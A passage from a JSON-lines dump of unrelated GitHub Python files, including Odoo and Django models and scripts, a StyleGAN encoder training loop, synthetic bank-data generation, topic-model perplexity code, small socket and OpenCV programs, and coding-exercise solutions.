vals):\n if vals.get('name', 'New') == 'New':\n vals['name'] = self.env['ir.sequence'].next_by_code(\n 'sale.incentive') or 'New'\n result = super(SaleIncentive, self).create(vals)\n return result\n\nclass BrandObjectives(models.Model):\n _name = \"brand.objectives\"\n _description = \"Brand Objectives\"\n\n sale_incentive_id = fields.Many2one('sale.incentive', string='Sale Incentive')\n no_brand_objetive = fields.Char(string=\"N° Brands with Objectives\")\n brand = fields.Many2one('brand.code', string=\"Brand\") # Marca\n code = fields.Char(string=\"Code\") # Codigo\n description = fields.Char(string=\"Description\")\n cupor_for_boxes = fields.Float(string=\"Cupo in boxes\") # Cupor por cajas\n space_in_bs = fields.Float(string=\"Cupo in Bs\") # Cupo en Bs\n sale_by_box = fields.Float(string=\"Sale by Boxes\") # Venta por Cajas\n sale_in_bs = fields.Float(string=\"Sale in Bs\") # Venta en Bs\n achievement_in_box = fields.Float(string=\"% Achievement in Boxes\", compute='_compute_achievement_in_box') # logro en Cajas\n tobe_charged_for_box = fields.Float(string=\"To be charged for boxes\", compute='_compute_tobe_charged_for_box') # A cobrar por cajas\n charged_for_box = fields.Float(string=\"Charge for boxes\", compute='_compute_charged_for_box') # Cobra por cajas\n\n\n @api.onchange('brand')\n def onchange_brand(self):\n for rec in self:\n if rec.brand:\n rec.code = rec.brand.code\n rec.no_brand_objetive = str(rec.sale_incentive_id.brands_objective)\n\n @api.depends('sale_by_box','cupor_for_boxes')\n def _compute_achievement_in_box(self):\n for rec in self:\n if rec.cupor_for_boxes > 0:\n rec.achievement_in_box = rec.sale_by_box / rec.cupor_for_boxes\n \n\n @api.depends('achievement_in_box')\n def _compute_tobe_charged_for_box(self):\n for rec in self:\n rec.tobe_charged_for_box = rec.achievement_in_box\n\n @api.depends('sale_incentive_id','tobe_charged_for_box')\n def _compute_charged_for_box(self):\n for rec in self:\n rec.charged_for_box = rec.tobe_charged_for_box * rec.sale_incentive_id.bonus_brand_boxes\n\nclass BrandCode(models.Model):\n _name = \"brand.code\"\n _rec_name = 'brand'\n _sql_constraints = [\n ('name_uniq',\n 'UNIQUE (brand)',\n 'Brand name must be unique.')\n ]\n\n code = fields.Char(string=\"Code\")\n brand = fields.Char(string=\"Brand\") # Marca\n\n\nclass Region(models.Model):\n _name = \"region.incentive\"\n _rec_name = 'name'\n\n code = fields.Char(string=\"Code\")\n name = fields.Char(string=\"Region\")\n","repo_name":"aaparicio87/Odoo12","sub_path":"Dorta/sales_modification/models/sale_incentive.py","file_name":"sale_incentive.py","file_ext":"py","file_size_in_byte":13901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25569476797","text":"from overwork.models import Person, Overs\nfrom django.contrib.auth.models import User\n\nall = Person.objects.all()\nallusers = User.objects.all()\nfor x in all:\n print(x, 'deleted')\n x.delete()\n\nfor x in allusers:\n print(x, 'deleted')\n x.delete()\n\nfor x in Overs.objects.all():\n x.delete()\n","repo_name":"anokata/comleave","sub_path":"scripts/deleteall.py","file_name":"deleteall.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"31837192940","text":"import os\nfrom tqdm import tqdm\nimport torch\nimport numpy as np\nimport dataset\nfrom generator import Generator\nfrom encoder_net import EncoderNet\nfrom torch.utils.data import DataLoader\nimport torch.optim as optim\nimport torch.nn.functional as F\nfrom utils.visualizer import save_image\nfrom models.perceptual_model import VGG16\nfrom signal import signal, SIGINT\nimport sys\n\n\ndef main():\n encoder = EncoderNet().to('cuda')\n imgTrainDataset = dataset.WPlusGeneratingDataset()\n dataloader = DataLoader(imgTrainDataset,\n batch_size=4,\n shuffle=True,\n num_workers=0,\n pin_memory=True)\n optimizer = optim.AdamW(encoder.parameters())\n\n num_epochs = 30\n feat_lambda = 1.0\n\n def intHandler(sigNum, frame):\n weight_name = 'encoder_weights_pretrain_test.pth'\n save_weights = input(\"\\nsave weights? y/[n]:\")\n if save_weights == 'y':\n torch.save(encoder.state_dict(), weight_name)\n print(f\"saved weights to {weight_name}\")\n exit(0)\n signal(SIGINT, intHandler)\n\n def compute_loss(wps, imgs):\n wps = wps.to('cuda')\n imgs = imgs.to('cuda')\n enc_wps = encoder(imgs).view(-1, 14, 512)\n loss = F.mse_loss(wps, enc_wps, \n reduction='mean')\n return loss\n\n def train_loop():\n losshist = np.zeros(len(dataloader))\n for i, data in enumerate(tqdm(dataloader)):\n wps, imgs = data\n optimizer.zero_grad()\n loss = compute_loss(wps, imgs)\n loss.backward()\n optimizer.step()\n losshist[i] = loss.cpu().detach().numpy()\n return np.mean(losshist)\n\n for epoch in range(15):\n loss = train_loop()\n print(f'{epoch}: loss={loss}')\n\n optimizer = optim.SGD(encoder.parameters(),\n lr=0.0001, momentum=0.9)\n scheduler = optim.lr_scheduler.StepLR(optimizer, \n step_size=15, \n gamma=0.1)\n\n for epoch in range(num_epochs):\n loss = train_loop()\n print(f'{epoch+15}: loss={loss}')\n scheduler.step()\n\n torch.save(encoder.state_dict(), 'encoder_weights_pretrain2.pth')\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"msrasheed/stylegan-inversion","sub_path":"pretrain.py","file_name":"pretrain.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35650811406","text":"import numpy as np\nimport pandas as pd\nfrom numpy import log as ln\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom tqdm.auto import tqdm\n\n\ndef extract_document_term_matrix(traintexts, used_vocabs, test=False, vect=None):\n if not test:\n vect = CountVectorizer()\n vect.fit(used_vocabs)\n\n vects = vect.transform(traintexts)\n\n document_term_matrix = pd.DataFrame(vects.todense())\n\n document_term_matrix.columns = vect.get_feature_names_out()\n if len(used_vocabs) != len(document_term_matrix.columns) and 0 < len(used_vocabs) - len(\n document_term_matrix.columns) <= 5:\n remaining = [w for w in used_vocabs if w not in document_term_matrix.columns]\n document_term_matrix[remaining] = 0\n document_term_matrix = document_term_matrix[used_vocabs]\n print(\"document_term created\")\n\n return document_term_matrix, vect\n\n\ndef extract_topic_term_matrix_tp(model):\n data_topic_words = [model.get_topic_word_dist(topic_id) for topic_id in range(model.k)]\n topic_term_matrix = pd.DataFrame(data_topic_words)\n topic_term_matrix.columns = model.used_vocabs\n print(\"topic_term created\")\n return topic_term_matrix\n\n\ndef extract_document_topic_matrix_tp(model, train=True, data_words_test=None):\n list_infers_train = []\n\n if train:\n for doc_idx in range(len(model.docs)):\n list_infers_train.append(model.infer(model.docs[doc_idx])[0])\n else:\n for doc in data_words_test:\n new_d = model.make_doc(doc)\n list_infers_train.append(model.infer(new_d)[0])\n\n document_topic_matrix = pd.DataFrame(list_infers_train)\n document_topic_matrix.columns = [\"topic\" + str(topic_id) for topic_id in range(model.k)]\n print(\"document_topic created\")\n\n return document_topic_matrix\n\n\ndef perplexity(document_term_matrix, document_topic_matrix, topic_term_matrix):\n ll = 0\n for row_idx in tqdm(range(len(document_term_matrix)), leave=False):\n used_words_in_doc = [document_term_matrix.columns[i] for i in\n np.where(document_term_matrix.iloc[row_idx] > 0)[0]]\n document_topic_doc = document_topic_matrix.to_numpy()[row_idx].reshape(1, -1)\n topic_term_doc = topic_term_matrix[used_words_in_doc]\n dotprod = np.matmul(document_topic_doc, topic_term_doc)\n logprod = np.matmul(ln(dotprod + 1e-16),\n document_term_matrix.iloc[row_idx][used_words_in_doc].to_numpy().reshape(-1, 1))\n\n ll += logprod\n\n ll = ll.values[0][0]\n perplexity_value = np.exp(-ll / sum(sum(document_term_matrix.values)))\n\n return perplexity_value, - ll / sum(sum(document_term_matrix.values))\n","repo_name":"matteoborrotti/automaticlabeling","sub_path":"code/custom_libraries/perplexityUtilities.py","file_name":"perplexityUtilities.py","file_ext":"py","file_size_in_byte":2688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3248677154","text":"# -*- coding: utf-8 -*-\r\n\r\n#from django.template import RequestContext\r\nfrom django.contrib.auth.decorators import login_required\r\n#from django.shortcuts import render_to_response\r\n\r\nfrom weixin2 import export\r\nfrom core.exceptionutil import unicode_full_stack\r\nfrom core import resource\r\nfrom core.jsonresponse import create_response\r\nfrom weixin2.models import FanCategory,FanHasCategory\r\nfrom modules.member.models import *\r\n#from .util import get_members\r\n\r\nfrom fans_category import DEFAULT_CATEGORY_NAME\r\n\r\nclass FansInfo(resource.Resource):\r\n\t\"\"\"\r\n\t粉丝的介绍信息\r\n\t\"\"\"\r\n\tapp = 'new_weixin'\r\n\tresource = 'fans_info'\r\n\r\n\t@staticmethod\r\n\tdef check_params(request):\r\n\t\tis_valid = True\r\n\t\tresponse = None\r\n\t\tif not 'id' in request.GET:\r\n\t\t\tis_valid = False\r\n\t\t\tresponse = create_response(500)\r\n\t\t\tresponse.errMsg = \"缺少参数: id\"\r\n\t\treturn (is_valid, response)\r\n\r\n\t@login_required\r\n\tdef api_get(request):\r\n\t\t\"\"\"\r\n\t\t获取粉丝(会员)的介绍信息\r\n\r\n\t\t~~~~~~~~~~{.c}\r\n\t\tinfo = {\r\n\t\t\t\"nickname\": u\"昵称\",\r\n\t\t\t\"remark\": u\"备注\",\r\n\t\t\t\"location\": u\"北京\",\r\n\t\t\t\"signature\": u\"签名\",\r\n\t\t\t\"category\": u\"未分组\",\r\n\t\t}\r\n\t\t~~~~~~~~~~\r\n\t\t\"\"\"\r\n\r\n\t\t#assert 'id' in request.GET\r\n\t\t(is_valid, response) = FansInfo.check_params(request)\r\n\r\n\t\tif is_valid:\r\n\t\t\tfan_id = request.GET.get('id')\r\n\t\t\tresponse = create_response(200)\r\n\r\n\t\t\t# 获取粉丝(会员)信息\r\n\t\t\ttry:\r\n\t\t\t\tsocial_member = Member.objects.get(id=fan_id)\r\n\t\t\t\tsocial_member_info = MemberInfo.objects.get(member=social_member)\r\n\t\t\t\r\n\t\t\t\tcategories = FanHasCategory.objects.filter(fan_id=fan_id)\r\n\t\t\t\tif len(categories)>0:\r\n\t\t\t\t\tcategory_name = categories[0].category.name\r\n\t\t\t\t\tcategory_id = categories[0].category.id\r\n\t\t\t\telse:\r\n\t\t\t\t\tcategory_name = DEFAULT_CATEGORY_NAME\r\n\t\t\t\t\tcategory_id = -1\r\n\t\t\t\t\r\n\t\t\t\taddress = \"%s %s %s\" % (social_member.country, social_member.province, social_member.city) \r\n\t\t\t\tinfo = {\r\n\t\t\t\t\t'nickname': social_member.username_for_html,\r\n\t\t\t\t\t'remark': social_member_info.name,\r\n\t\t\t\t\t'location': address,\r\n\t\t\t\t\t'signature': '', # where to get?\r\n\t\t\t\t\t'category': category_name,\r\n\t\t\t\t\t'category_id': category_id,\r\n\t\t\t\t}\r\n\t\t\t\tresponse.data = {\r\n\t\t\t\t\t'info': info\r\n\t\t\t\t}\r\n\t\t\texcept Member.DoesNotExist:\r\n\t\t\t\tresponse = create_response(501)\r\n\t\t\t\tresponse.errMsg = u'无效id'\r\n\t\t\t\t#response.innerErrMsg = unicode_full_stack()\r\n\t\t\texcept MemberInfo.DoesNotExist:\r\n\t\t\t\tresponse = create_response(502)\r\n\t\t\t\tresponse.errMsg = u'无有效用户信息'\r\n\t\t\texcept:\r\n\t\t\t\tresponse = create_response(500)\r\n\t\t\t\tresponse.errMsg = u'获取粉丝详情失败(如无效ID)'\r\n\t\t\t\tresponse.innerErrMsg = unicode_full_stack()\r\n\t\treturn response.get_response()\r\n","repo_name":"chengdg/weizoom","sub_path":"weapp/weixin2/advance_manage/fans_info.py","file_name":"fans_info.py","file_ext":"py","file_size_in_byte":2644,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"70893115433","text":"import os\nimport numpy as np\nimport pandas as pd\nfrom datetime import datetime\nfrom pyspark.sql.types import LongType, IntegerType, StringType\nimport dbldatagen as dg\nimport dbldatagen.distributions as dist\nfrom dbldatagen import FakerTextFactory, DataGenerator, fakerText\nfrom faker.providers import bank, credit_card, currency\nimport cml.data_v1 as cmldata\n\n\nclass BankDataGen:\n\n '''Class to Generate Banking Data'''\n\n def __init__(self, spark, username):\n self.spark = spark\n self.username = username\n\n def bankDataGen(self, shuffle_partitions_requested = 8, partitions_requested = 8, data_rows = 10000):\n\n # setup use of Faker\n FakerTextUS = FakerTextFactory(locale=['en_US'], providers=[bank])\n\n # partition parameters etc.\n self.spark.conf.set(\"spark.sql.shuffle.partitions\", shuffle_partitions_requested)\n\n fakerDataspec = (DataGenerator(self.spark, rows=data_rows, partitions=partitions_requested)\n .withColumn(\"name\", percentNulls=0.1, text=FakerTextUS(\"name\") )\n .withColumn(\"address\", text=FakerTextUS(\"address\" ))\n .withColumn(\"email\", text=FakerTextUS(\"ascii_company_email\") )\n .withColumn(\"age\", \"decimal\", minValue=10, maxValue=100, random=True)\n .withColumn(\"credit_card_balance\", \"decimal\", minValue=100, maxValue=30000, random=True)\n .withColumn(\"bank_account_balance\", \"decimal\", minValue=0.01, maxValue=100000, random=True)\n .withColumn(\"mortgage_balance\", \"decimal\", minValue=0.01, maxValue=1000000, random=True)\n .withColumn(\"sec_bank_account_balance\", \"decimal\", minValue=0.01, maxValue=100000, random=True)\n .withColumn(\"savings_account_balance\", \"decimal\", minValue=0.01, maxValue=500000, random=True)\n .withColumn(\"sec_savings_account_balance\", \"decimal\", minValue=0.01, maxValue=500000, random=True)\n .withColumn(\"total_est_nworth\", \"decimal\", minValue=10000, maxValue=500000, random=True)\n .withColumn(\"primary_loan_balance\", \"decimal\", minValue=0.01, maxValue=5000, random=True)\n .withColumn(\"secondary_loan_balance\", \"decimal\", minValue=0.01, maxValue=500000, random=True)\n .withColumn(\"college_loan_balance\", \"decimal\", minValue=0.01, maxValue=10000, random=True)\n .withColumn(\"aba_routing\", text=FakerTextUS(\"aba\" ))\n .withColumn(\"bank_country\", text=FakerTextUS(\"bank_country\") )\n .withColumn(\"account_no\", text=FakerTextUS(\"bban\" ))\n .withColumn(\"int_account_no\", text=FakerTextUS(\"iban\") )\n .withColumn(\"swift11\", text=FakerTextUS(\"swift11\" ))\n .withColumn(\"credit_card_number\", text=FakerTextUS(\"credit_card_number\") )\n .withColumn(\"credit_card_provider\", text=FakerTextUS(\"credit_card_provider\") )\n .withColumn(\"event_type\", \"string\", values=[\"purchase\", \"cash_advance\"],random=True)\n .withColumn(\"longitude\", \"float\", minValue=-180, maxValue=180, random=True)\n .withColumn(\"latitude\", \"float\", minValue=-90, maxValue=90, random=True)\n .withColumn(\"transaction_currency\", values=[\"USD\", \"EUR\", \"KWD\", \"BHD\", \"GBP\", \"CHF\", \"MEX\"])\n .withColumn(\"transaction_amount\", \"decimal\", minValue=0.01, maxValue=30000, random=True)\n .withColumn(\"fraud\", values=[\"YES\", \"NO\"], random=True, weights=[9, 1])\n )\n df = fakerDataspec.build()\n\n return df\n\n\n# Sample in-code customization of spark configurations\nfrom pyspark import SparkContext\nSparkContext.setSystemProperty('spark.executor.cores', '2')\nSparkContext.setSystemProperty('spark.executor.memory', '4g')\n\nCONNECTION_NAME = \"go01-aw-dl\"\nconn = cmldata.get_connection(CONNECTION_NAME)\nspark = conn.get_spark_session()\nusername = os.environ[\"PROJECT_OWNER\"]\ndbname = \"MLOPS\"\n\n#---------------------------------------------------\n# SQL CLEANUP: DATABASES, TABLES, VIEWS\n#---------------------------------------------------\nprint(\"JOB STARTED...\")\n#spark.sql(\"DROP DATABASE IF EXISTS {} CASCADE\".format(dbname))\n\nspark.sql(\"CREATE DATABASE IF NOT EXISTS {}\".format(dbname))\n\nprint(\"SHOW DATABASES LIKE '{}'\".format(dbname))\nspark.sql(\"SHOW DATABASES LIKE '{}'\".format(dbname)).show()\nprint(\"\\n\")\n\n#---------------------------------------------------\n# CREATE BATCH DATA\n#---------------------------------------------------\n\nprint(\"CREATING BANKING TRANSACTIONS\\n\")\n\ndg = BankDataGen(spark, username)\n\nbankTransactionsDf = dg.bankDataGen()\n\ndef createOrAppend(df, dbname, username):\n \"\"\"\n Method to create or append data to the BANKING TRANSACTIONS table\n The table is used to simulate batches of new data\n The table is meant to be updated periodically as part of a CML Job\n \"\"\"\n \n try:\n print(\"TRY TO APPEND NEW BATCH OF DATA\\n\")\n df.writeTo(\"{0}.BANKING_TRANSACTIONS_{1}\".format(dbname, username))\\\n .using(\"iceberg\").tableProperty(\"write.format.default\", \"parquet\").append()\n print(\"TABLE WAS FOUND AND DATA WAS APPENDED\\n\")\n \n except:\n print(\"TABLE WAS NOT FOUND\\n\")\n print(\"CREATING TABLE NOW\\n\")\n df.writeTo(\"{0}.BANKING_TRANSACTIONS_{1}\".format(dbname, username))\\\n .using(\"iceberg\").tableProperty(\"write.format.default\", \"parquet\").createOrReplace()\n print(\"TABLE CREATED AND POPULATED WITH DATA\\n\")\n \ncreateOrAppend(bankTransactionsDf, dbname, username)\n \nprint(\"BATCH LOAD JOB COMPLETED\\n\")\n","repo_name":"pdefusco/MLOps_CML_DEV_Proj","sub_path":"0_data_gen.py","file_name":"0_data_gen.py","file_ext":"py","file_size_in_byte":5650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33447504952","text":"from copy import deepcopy\nfrom utils import read_file\n\npart_1_crates = {\n 1: ['L', 'C', 'G', 'M', 'Q'],\n 2: ['G', 'H', 'F', 'T', 'C', 'L', 'D', 'R'],\n 3: ['R', 'W', 'T', 'M', 'N', 'F', 'J', 'V'],\n 4: ['P', 'Q', 'V', 'D', 'F', 'J'],\n 5: ['T', 'B', 'L', 'S', 'M', 'F', 'N'],\n 6: ['P', 'D', 'C', 'H', 'V', 'N', 'R'],\n 7: ['T', 'C', 'H'],\n 8: ['P', 'H', 'N', 'Z', 'V', 'J', 'S', 'G'],\n 9: ['G', 'H', 'F', 'Z']\n}\n\npart1_test_crates = {\n 1: ['Z', 'N'],\n 2: ['M', 'C', 'D'],\n 3: ['P']\n}\n\npart_2_crates = deepcopy(part_1_crates)\npart2_test_crates = deepcopy(part1_test_crates)\n\n\ndef get_instructions():\n raw_data = read_file(\"./day5/day5-instructions-input.txt\")\n instructions = []\n for instruction in raw_data.splitlines():\n instructions.append([int(s) for s in instruction.split() if s.isdigit()])\n return instructions\n\n\ndef move_boxes_part1(q, s, d):\n for _ in range(q):\n part_1_crates[d].append(part_1_crates[s][-1])\n part_1_crates[s].pop()\n\n\ndef move_boxes_part2(q, s, d):\n part_2_crates[d].extend([part_2_crates[s].pop() for _ in range(q)][::-1])\n\n\ndef get_day5_results_for_first_part():\n instructions = get_instructions()\n for quantity, source, destination in instructions:\n move_boxes_part1(quantity, source, destination)\n result = \"\"\n for i in part_1_crates:\n result += part_1_crates[i][-1]\n return result\n\n\ndef get_day5_results_for_second_part():\n instructions = get_instructions()\n for quantity, source, destination in instructions:\n move_boxes_part2(quantity, source, destination)\n result = \"\"\n for i in part_2_crates:\n result += part_2_crates[i][-1]\n return result\n","repo_name":"NorbertRuff/AdventOfCodePython2022","sub_path":"day5/day5_resolver.py","file_name":"day5_resolver.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29460225548","text":"import pandas\n\ndataset = pandas.read_csv(\"example.csv\")\n\ncolumns = dataset.columns\n\ncategoryType = columns[0]\nxType = columns[1]\nyType = columns[2]\n\ncategorySeries = dataset[categoryType]\nxSeries = dataset[xType]\nySeries = dataset[yType]\n\n\n\nxMin = xSeries.min()\nxMax = xSeries.max()\n\nxRange = abs(xMin)+abs(xMax)\n\n\nbuffer = int(xRange * .1)\n\n\nyAxisList = []\nmarker = xMin-buffer\nwhile marker < xMax:\n yAxisList.append(marker)\n marker += buffer\n\n\nfor item in yAxisList:\n print(item)\n\nrawLine = yAxisList[0]+yAxisList[-1]","repo_name":"sanigak/PlottingWithoutMatplotlib","sub_path":"PlottingWithoutMatplotlib/ParsingMethods.py","file_name":"ParsingMethods.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71003623592","text":"import cv2\nimport numpy as np\n\ndef draw_circle(event,x,y,flags,param):\n if(event == cv2.EVENT_RBUTTONDOWN):\n cv2.circle(img,(x,y),100,(255,0,0),thickness=10)\ncv2.namedWindow(winname = 'drawing')\ncv2.setMouseCallback('drawing',draw_circle)\n\nimg = cv2.imread('../DATA/dog_backpack.png')\n\nwhile True:\n cv2.imshow('drawing',img)\n if(cv2.waitKey(2) & 0xFF == 27):\n break\ncv2.destroyAllWindows()","repo_name":"DimaMirana/UDEMY-Image-Processing-with-OpenCV-and-Python","sub_path":"image basics/rightClick.py","file_name":"rightClick.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40798551431","text":"import sys\nfrom ting_file_management.file_management import txt_importer\n\n\ndef process(path_file, instance):\n file_description = {\n \"nome_do_arquivo\": path_file,\n \"qtd_linhas\": len(txt_importer(path_file)),\n \"linhas_do_arquivo\": txt_importer(path_file),\n }\n\n if file_description not in instance.queue:\n instance.enqueue(file_description)\n\n print(file_description, file=sys.stdout)\n\n\ndef remove(instance):\n if not len(instance):\n print(\"Não há elementos\", file=sys.stdout)\n else:\n print(\n \"Arquivo %s removido com sucesso\"\n % (instance.dequeue()[\"nome_do_arquivo\"]),\n file=sys.stdout,\n )\n\n\ndef file_metadata(instance, position):\n if position >= len(instance) or position < 0:\n print(\"Posição inválida\", file=sys.stderr)\n else:\n print(\"%s\" % (instance.search(position)), file=sys.stdout)\n","repo_name":"mpdsa/Cursos--Trybe--Computer_Science--T.I.N.G","sub_path":"ting_file_management/file_process.py","file_name":"file_process.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16684194194","text":"import os\nfrom config import RunConfig\nimport logging\nimport click\nimport pytest\n\n# logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')\n# logger = logging.getLogger(__name__)\n\n@click.command()\n@click.option('-m', default=None, help='输入运行模式:run 或 debug.')\ndef run(m):\n if m is None or m == \"run\":\n #logger.info(\"回归模式,开始执行✈✈!\")\n pytest.main([\"-s\", \"-v\", RunConfig.cases_path,\n \"--maxfail\", RunConfig.max_fail,\n \"--reruns\", RunConfig.rerun])\n #logger.info(\"运行结束,生成测试报告♥❤!\")\n elif m == \"debug\":\n print(\"debug模式,开始执行!\")\n pytest.main([\"-v\", \"-s\", RunConfig.cases_path])\n print(\"运行结束!!\")\n\nif __name__ == '__main__':\n run()","repo_name":"keywong-github/repo44","sub_path":"my_pytest/run_tests.py","file_name":"run_tests.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33769177746","text":"from matplotlib import pyplot as plt\nimport os\n\nfor d1 in os.listdir('Result'):\n for file in os.listdir('Result/'+d1):\n if file.endswith('stats'):\n x = []\n mean = []\n sd = []\n ci = []\n\n with open('Result/'+d1+'/'+file) as f:\n for line in f:\n line = line.strip()\n if line != '':\n line = line.split(',')\n x.append(int(line[0]))\n mean.append(float(line[1]))\n sd.append(float(line[2]))\n ci.append(float(line[4]))\n print(x,mean,sd,ci)\n\n plt.scatter(x, mean, label=\"Mean Plot\")\n # plt.plot(x, mean, '-ok')\n plt.xlabel('n')\n plt.ylabel('mean time(ms)')\n plt.legend()\n plt.savefig('Figures/' + d1 + '_mean.png')\n plt.clf()\n\n plt.scatter(x, sd, label=\"S.D. Plot\")\n # plt.plot(x, sd)\n plt.xlabel('n')\n plt.ylabel('std dev.')\n plt.legend()\n plt.savefig('Figures/' + d1 + '_sd.png')\n plt.clf()\n\n plt.scatter(x, ci, label=\"CI Plot\")\n # plt.plot(x, ci)\n plt.xlabel('n')\n plt.ylabel('margin of error for 95% CI')\n plt.legend()\n plt.savefig('Figures/' + d1 + '_ci.png')\n plt.clf()","repo_name":"suraj-iitb/algorithm-identification","sub_path":"Execution/Time/Statistics/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14454361832","text":"import os\nimport signal\nfrom threading import Thread\nimport socket\nimport protocol\nimport json\n\nIP = \"127.0.0.1\"\nPORT = 6123\n\ncard = []\nresult = []\nlimit = 7.5\n\n\nclass ClientThread(Thread):\n def __init__(self, client_socket, client_address):\n Thread.__init__(self)\n self.client_socket = client_socket\n self.client_address = client_address\n self.total = 0\n self.stop = False\n\n def manage_join(self):\n print(f\"[JOIN] {self.client_address} JOINED\")\n self.manage_answer()\n\n def random_number(self):\n import random\n random_num = random.randint(1, 10)\n card.append(random_num)\n return random_num\n\n def sum(self, num):\n\n if 1 <= num <= 7:\n num = num\n elif 8 <= num <= 10:\n num = 0.5\n\n self.total += num\n\n def manage_answer(self):\n end = False\n win = False\n try:\n num = self.random_number()\n self.sum(num)\n if self.total >= limit:\n end = True\n elif self.total == limit:\n win = True\n\n msg_envio = f\"[ANSWER] {self.client_address} answered add num: {num} and the sum is: {self.total}\"\n message = {'header': protocol.ANSWER, 'sum': msg_envio, 'end': end, 'win': win}\n protocol.send_one_message(self.client_socket, message)\n print(f\"[ANSWER] send to {self.client_address} \")\n\n except KeyError:\n raise protocol.InvalidProtocol\n\n def handle_message(self, message):\n try:\n message_header = message['header']\n if message_header == protocol.JOIN:\n self.manage_join()\n elif message_header == protocol.REQUEST:\n self.manage_answer()\n elif message_header == protocol.END:\n msg = {'header': protocol.END, 'sum': self.sum()}\n protocol.send_one_message(self.client_socket, msg)\n self.stop = True\n else:\n raise protocol.InvalidProtocol\n except KeyError:\n raise protocol.InvalidProtocol\n\n def run(self):\n print(f\"Connection received from {self.client_address}\")\n while not self.stop:\n try:\n message = protocol.recv_one_message(self.client_socket)\n self.handle_message(message)\n except protocol.InvalidProtocol as e:\n print(e)\n except protocol.ConnectionClosed:\n self.stop = True\n\n\nclass ServerSocketThread(Thread):\n def __init__(self):\n Thread.__init__(self)\n self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n\n self.server_socket.bind((IP, PORT))\n self.server_socket.listen()\n\n def run(self):\n ip, port = self.server_socket.getsockname()\n print(f\"Server listening on ({ip}, {port})...\")\n while True:\n client_socket, client_address = self.server_socket.accept()\n client_thread = ClientThread(client_socket, client_address)\n client_thread.start()\n\n\npid = os.getpid() # get the pid of the current process\nserver_socket_thread = ServerSocketThread()\nserver_socket_thread.start()\ntry:\n stop = False\n while not stop:\n command = input()\nexcept KeyboardInterrupt:\n print(\"Server stopped by admin\")\nos.kill(pid, signal.SIGTERM)\n\n\n\n","repo_name":"Mrtony94/Examen_L2_GIT","sub_path":"halfpastseven/tony_server.py","file_name":"tony_server.py","file_ext":"py","file_size_in_byte":3480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28482278644","text":"# https://leetcode.com/problems/find-all-possible-recipes-from-given-supplies/\n\nclass Solution:\n def findAllRecipes(self, recipes: List[str], ingredients: List[List[str]], supplies: List[str]) -> List[str]:\n graph = defaultdict(list)\n requirements = defaultdict(int)\n q = deque(supplies)\n creatable = []\n\n for i, recipe in enumerate(recipes):\n for ing in ingredients[i]:\n graph[ing].append(recipe)\n requirements[recipe] = len(ingredients[i])\n\n while q:\n item = q.popleft()\n\n for rec in graph[item]:\n requirements[rec] -= 1\n if requirements[rec] == 0:\n q.append(rec)\n creatable.append(rec)\n\n return creatable\n","repo_name":"nawrazi/competitive-programming","sub_path":"week_17/all-possible-recipes-from-given-supplies.py","file_name":"all-possible-recipes-from-given-supplies.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34274776697","text":"import math\n\nhour_exam = int(input())\nminute_exam = int(input())\nhour_arrive = int(input())\nminute_arrive = int(input())\n\nall_minute_exam = hour_exam * 60 + minute_exam\nall_minute_arrive = hour_arrive * 60 + minute_arrive\n\nif all_minute_arrive <= all_minute_exam:\n if all_minute_exam - all_minute_arrive <= 30:\n diff = all_minute_exam - all_minute_arrive\n print(\"On time\")\n if diff != 0:\n print(f'{diff} minutes before the start')\n else:\n diff = all_minute_exam - all_minute_arrive\n diff_hour = math.floor(diff / 60)\n diff_min = math.floor(diff % 60)\n if diff_hour == 0:\n print(\"Early\")\n print(f'{diff} minutes before the start')\n elif 0 <= diff_min < 10:\n print(\"Early\")\n print(f'{diff_hour}:0{diff_min} hours before the start')\n else:\n print(\"Early\")\n print(f'{diff_hour}:{diff_min} hours before the start')\nelse:\n diff = all_minute_arrive - all_minute_exam\n diff_hour = math.floor(diff / 60)\n diff_min = math.floor(diff % 60)\n if diff_hour == 0:\n print(\"Late\")\n print(f'{diff} minutes after the start')\n else:\n if 0<=diff_min<10:\n print(\"Late\")\n print(f'{diff_hour}:0{diff_min} hours after the start')\n else:\n print(\"Late\")\n print(f'{diff_hour}:{diff_min} hours after the start')\n","repo_name":"Dochko0/Python","sub_path":"Python_Basics/05_Nested_Conditional_Statements_Exercise/07_On_Time_For_The_Exam.py","file_name":"07_On_Time_For_The_Exam.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73465844074","text":"from 